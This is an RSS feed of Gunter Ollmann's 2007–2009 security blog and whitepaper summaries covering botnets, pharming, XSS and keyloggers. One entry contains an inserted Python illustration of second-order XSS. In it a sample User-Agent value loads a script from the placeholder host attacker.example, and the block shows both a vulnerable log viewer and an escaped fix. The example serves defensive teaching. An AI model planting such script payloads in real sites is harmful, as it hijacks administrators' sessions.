<?xml version="1.0"?>

<rss version="2.0">

   <channel>

      <title>Technicalinfo.net Security</title>

      <link>http://www.technicalinfo.net</link>

      <description>Security thoughts and observations of Gunter Ollmann</description>

      <language>en-us</language>

      <lastBuildDate>Sun, 14 Jun 2009 21:00:00 EST</lastBuildDate>

      <docs>http://blogs.law.harvard.edu/tech/rss</docs>

      <copyright>Copyright 2009, Gunter Ollmann</copyright>

      <item>

         <title>Botnet Communication Topologies</title>

         <description>A clear distinction between a bot agent and a common piece of malware lies in a bot’s ability to communicate with a Command-and-Control (CnC) infrastructure. CnC allows a bot agent to receive new instructions and malicious capabilities, as dictated by a remote criminal entity. The compromised host can then be used as an unwilling participant in Internet crime as soon as it is linked into a botnet via that same CnC.  The criminals actively controlling botnets must ensure that their CnC infrastructure is sufficiently robust to manage tens of thousands of globally scattered bot agents, as well as to resist attempts to hijack or shut down the botnet. Botnet operators have consequently developed a range of technologies and tactics to protect their CnC investment. This paper reviews the tactics commonly employed by botnet operators to maintain control of their botnets and the impact of these tactics on standard network-blocking protection stratagems.</description>

         <link>http://www.technicalinfo.net/papers/BotnetCommunicationTopologies.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sun, 14 Jun 2009 21:00:00 EST</pubDate>

      </item>

      <item>

         <title>The Botnet vs. Malware Relationship</title>

         <description>A common misperception of cyber-crime botnets is that a one-to-one relationship exists between a malware bot agent and an individual botnet. Even if this had been a true statement back when botnets first began to appear, it is not true today. The key is the development of commercial build-it-yourself malware kits. These professional-grade tools lower the entry-level requirements for creating a malware bot agent, constructing a Command-and-Control (CnC) structure, and controlling the resultant botnet.  As a result, sophisticated botnets are well within the grasp of any technically-savvy user who knows how to use an Internet search engine and build a Web site. Enterprise organizations must change their focus from identifying malware by name to identifying the criminals behind individual botnets in order to keep up with this evolving threat.</description>

         <link>http://www.technicalinfo.net/papers/BotnetMalwareRelationship.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sun, 14 Jun 2009 21:00:00 EST</pubDate>

      </item>
 
      <item>

         <title>Anti-Fraud Image Solutions Whitepaper</title>

         <description>Many of today’s more successful Internet-based fraud tactics require the counterfeiting of popular transactional Web sites such as financial portals, stock-trading platforms and online retail sites. For the fraud to be successful, the cyber-criminal must typically clone most, if not all, of the targeted site’s content and host the counterfeit site on a Web server under their control. With some minor modifications to the underlying HTML code and changes to the application logic, the cyber-criminal will seek to steal the personal authentication or authorization credentials of unlucky victims who fall for the counterfeit site. Armed with these credentials, the cyber-criminal will subsequently attempt to defraud the accounts of their victim. This whitepaper provides an overview of the image-based techniques available to organizations that wish to identify such counterfeit sites – evaluating the pros and cons of the various mechanisms and providing advice on how to employ this class of investigative technology.</description>

         <link>http://www.technicalinfo.net/papers/AntiFraudImageSolutions.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Mon, 27 Apr 2009 21:00:00 EST</pubDate>

      </item>
 
      <item>

         <title>Security Blogging and Damballa</title>

         <description>Gunter's changed jobs and now has a personal security blog that gets updated regularly!</description>

         <link>http://www.technicalinfo.net/blog/security/20090411_BloggingAndDamballa.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sat, 11 Apr 2009 08:00:00 EST</pubDate>

      </item>
      
      <item>

         <title>Continuing Business with Malware Infected Customers Whitepaper</title>

         <description>The problem facing online businesses going forward is this: if upwards of one-third of their customers are likely to be using computers infected with malware to conduct business transactions with them, how should they continue to do business with an infected customer base? This new whitepaper discusses many of the best practices businesses can adopt in their Web application design and back-office support processes in order to minimize the growing threat of man-in-the-browser malware, along with helping to reduce several of the risks posed by continuing to do business with customers likely to be operating infected computers...</description>

         <link>http://www.technicalinfo.net/blog/security/20081102_MalwareInfectedCustomers.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sun, 02 Nov 2008 20:45:00 EST</pubDate>

      </item>
      
      <item>

         <title>SEO Code Injection Whitepaper</title>

         <description>Following several press interviews over the last couple of months, it was clear that many people don't quite grasp how the recent spate of SEO code injection attacks worked. Sure, they understand the concept of the mass-defacements, but many people seem to think that it's the search engine's fault.
In reality, it has very little to do with the search engine itself; it's all about the way "smart" applications have tried to optimize their page content so they can get better page ranks in the resultant searches of potential customers. This Search Engine Optimization (SEO) can be abused fairly easily.
So, in order to help explain how the attack actually works, and propose some remediation/protection steps, I've created a new whitepaper on the subject - titled SEO Code Injection.</description>

         <link>http://www.technicalinfo.net/blog/security/20080831_SEOCodeInjection.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sun, 31 Aug 2008 16:00:01 EST</pubDate>

      </item>
      <item>

         <title>Back catalog of Blogs</title>

         <description>Newly added 2008 archive of Frequency-X postings by Gunter.</description>

         <link>http://www.technicalinfo.net/blog/ISS/2008/index.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Fri, 01 Aug 2008 01:00:01 EST</pubDate>

      </item>
      <item>

         <title>Understanding the Web browser threat</title>

         <description>Examination of the vulnerable online Web browser population and the "insecurity iceberg". With 623 million users vulnerable to bugs in the Web browser, what does this mean going forward for Internet security? </description>

         <link>http://www.technicalinfo.net/papers/UnderstandingTheWebBrowserThreat.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Tue, 01 Jul 2008 12:00:01 EST</pubDate>

      </item>
      <item>

         <title>Patching A Sick Health Care System</title>

         <description>After some time away, I'm back to writing for SC Magazine. This month's article covers the problems in patching the embedded systems used in health care organizations.</description>

         <link>http://www.technicalinfo.net/blog/security/20080423_HealthCarePatching.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Wed, 23 Apr 2008 19:10:00 EST</pubDate>

      </item>

      <item>

         <title>2007 Vulnerability Disclosure Rates</title>

         <description>According to X-Force, there has been a 5.4 percent year-on-year decrease in the annual disclosure of new vulnerabilities. Why? In this blog entry I examine the probable influences in the decrease - decreasing vulnerability appeal, vendor security testing improvements, professional bug-hunters and vulnerability purchase programs...</description>

         <link>http://www.technicalinfo.net/blog/security/20080210_2007VulnerabilityCounts.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sun, 10 Feb 2008 17:50:00 EST</pubDate>

      </item>

      <item>

         <title>The Pharming Guide - Part 2</title>

         <description>The Pharming Guide provides detailed analysis of the pharming threat. This second part covers in detail the attack vectors used to conduct the attack and the protection elements needed to secure against the threat.</description>

         <link>http://www.technicalinfo.net/papers/Pharming2.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sun, 27 Jan 2008 19:00:00 EST</pubDate>

      </item>

      <item>

         <title>The Pharming Guide - Part 1</title>

         <description>The Pharming Guide provides detailed analysis of the pharming threat. This first part covers the nature of the threat and a detailed analysis of how DNS actually works in the real world.</description>

         <link>http://www.technicalinfo.net/papers/Pharming.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sat, 26 Jan 2008 18:00:00 EST</pubDate>

      </item>

      <item>

         <title>User-Agent Attacks</title>

         <description>How can you automatically 0wn a Web site the next time the administrator logs in? Through the User-Agent field of your Web browser of course! A fabulous example of second-order cross-site scripting.</description>
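         <![CDATA[
Worked illustration, added here and not code from the original post: the second-order cross-site scripting pattern the entry describes. A visitor sends a request with a script payload in the User-Agent header; the site stores the header in its access log; later, an administrative log viewer renders the stored value into HTML without escaping, and the payload executes in the administrator's browser with the administrator's session. The log entries, the attacker host name and the viewer functions are all constructed for this example; the fix shown (HTML-escaping every untrusted field at the output sink) is the standard remediation, not something taken from the post.

```python
import html

# Constructed sample access log. The second entry is the attacker's visit: the
# payload lives in the User-Agent header, which the site never renders to the
# visitor, only to the administrator later (hence "second-order").
SAMPLE_REQUESTS = [
    {"ip": "203.0.113.7", "path": "/index.html",
     "user_agent": "Mozilla/5.0 (Windows NT 6.0; rv:1.9) Gecko/2008 Firefox/3.0"},
    {"ip": "198.51.100.23", "path": "/login",
     # attacker.example is a placeholder host for this illustration
     "user_agent": '<script src="http://attacker.example/steal.js"></script>'},
]


def render_log_vulnerable(requests):
    """Naive admin log viewer: stored header values are dropped straight into
    the page. When the administrator opens this page, the stored <script>
    executes with the administrator's cookies and privileges."""
    rows = "".join(
        f"<tr><td>{r['ip']}</td><td>{r['path']}</td><td>{r['user_agent']}</td></tr>"
        for r in requests
    )
    return f"<table>{rows}</table>"


def render_log_safe(requests):
    """Same viewer with every untrusted field HTML-escaped at the rendering
    sink. Escaping on output (rather than trusting earlier 'sanitised' input)
    matters because the log is written by one component and read by others."""
    rows = "".join(
        "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
            html.escape(r["ip"], quote=True),
            html.escape(r["path"], quote=True),
            html.escape(r["user_agent"], quote=True),
        )
        for r in requests
    )
    return f"<table>{rows}</table>"


def contains_live_script(rendered_html):
    """Crude check used to compare the two renderings: is there a real
    <script ...> tag left in the output, as opposed to the escaped &lt;script?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print("vulnerable viewer executes payload:",
          contains_live_script(render_log_vulnerable(SAMPLE_REQUESTS)))
    print("escaped viewer executes payload:   ",
          contains_live_script(render_log_safe(SAMPLE_REQUESTS)))
```

The same defect appears wherever a logging or analytics tool echoes Referer, X-Forwarded-For or other client-supplied headers into an HTML report; the header is untrusted input regardless of which component stored it, and a Content-Security-Policy on the administrative interface is a useful second layer if the escaping is ever missed.
         ]]>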

         <link>http://www.technicalinfo.net/blog/security/20080121_UserAgentAttacks.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Mon, 21 Jan 2008 19:55:00 EST</pubDate>

      </item>

      <item>

         <title>Hacking a Boeing 787?</title>

         <description>The FAA document entitled “Special Conditions: Boeing Model 787-8 Airplane; Systems and Data Networks Security--Isolation or Protection From Unauthorized Passenger Domain Systems Access” raises the possibility of mile-high hacking a fly-by-wire, multi-million dollar, aircraft.</description>

         <link>http://www.technicalinfo.net/blog/security/20080107_HackingBoeing787.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Mon, 7 Jan 2008 19:15:00 GMT</pubDate>

      </item>

      <item>

         <title>WHOIS XSS</title>

         <description>There's been a little fuss over a recent posting concerning the threat of WHOIS cross-site scripting. To get your attention, it starts with “This is massive.” Now don’t get me wrong, there is a threat, but it is marginal – and I’ll explain why in a little bit. What’s all the fuss about?</description>

         <link>http://www.technicalinfo.net/blog/security/20080104_WhoisXSS.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Fri, 4 Jan 2008 08:45:00 GMT</pubDate>

      </item>

      <item>

         <title>Hacking Barcodes</title>

         <description>"Barcode systems susceptible to serious hacker attacks" - so says Heise Security, in their article posted yesterday concerning FX's presentation at this week's 24th Chaos Communication Congress. The article describes a few of the threats to systems that rely upon barcodes (one- and two-dimensional) - in particular their ease of manipulation for scamming purposes and the possibilities for code injection attacks. </description>

         <link>http://www.technicalinfo.net/blog/security/20080101_HackingBarcodes.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Tue, 1 Jan 2008 17:47:00 GMT</pubDate>

      </item>

      <item>

         <title>Commercial Keyloggers</title>

         <description>Commercial keyloggers are designed for use by corporate IT/Security/Audit teams and law enforcement agencies, and they're way more advanced than their malware cousins.</description>

         <link>http://www.technicalinfo.net/blog/security/20071230_CommercialKeylogger.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sun, 30 Dec 2007 18:00:00 GMT</pubDate>

      </item>

      <item>
         <title>Professional Keylogging</title>

         <description>Whether it's deployed in hardware or software formats, for as long as people rely upon password protected authentication processes, the keylogger will continue to be a reliable hacking tool.</description>

         <link>http://www.technicalinfo.net/blog/security/20071222_HardwareKeyloggers.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Sat, 22 Dec 2007 18:00:00 GMT</pubDate>

      </item>

      <item>
         <title>Little Pinkie</title>

         <description>In short (pun intended), females suggest that Australian boy racers are somewhat lacking in the trouser department.  Apparently the campaign has been a roaring success and has helped reduce speeding down under.</description>

         <link>http://www.technicalinfo.net/blog/security/20071016_LittlePinkie.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Tue, 16 Oct 2007 20:00:00 GMT</pubDate>

      </item>

      <item>
         <title>Pained by Security Analogies</title>

         <description>Whenever I have to resort to using some kind of physical-world analogy to explain an Internet security principle, I can't but feel that I'm doing a disservice to the people listening.  Depending upon the audiences involved, my analogies have ranged far and wide.</description>

         <link>http://www.technicalinfo.net/blog/security/20070921_SecurityAnalogies.html</link>
         
         <author>Gunter Ollmann</author>

         <pubDate>Fri, 21 Sep 2007 20:00:00 GMT</pubDate>

      </item>

   </channel>

</rss>
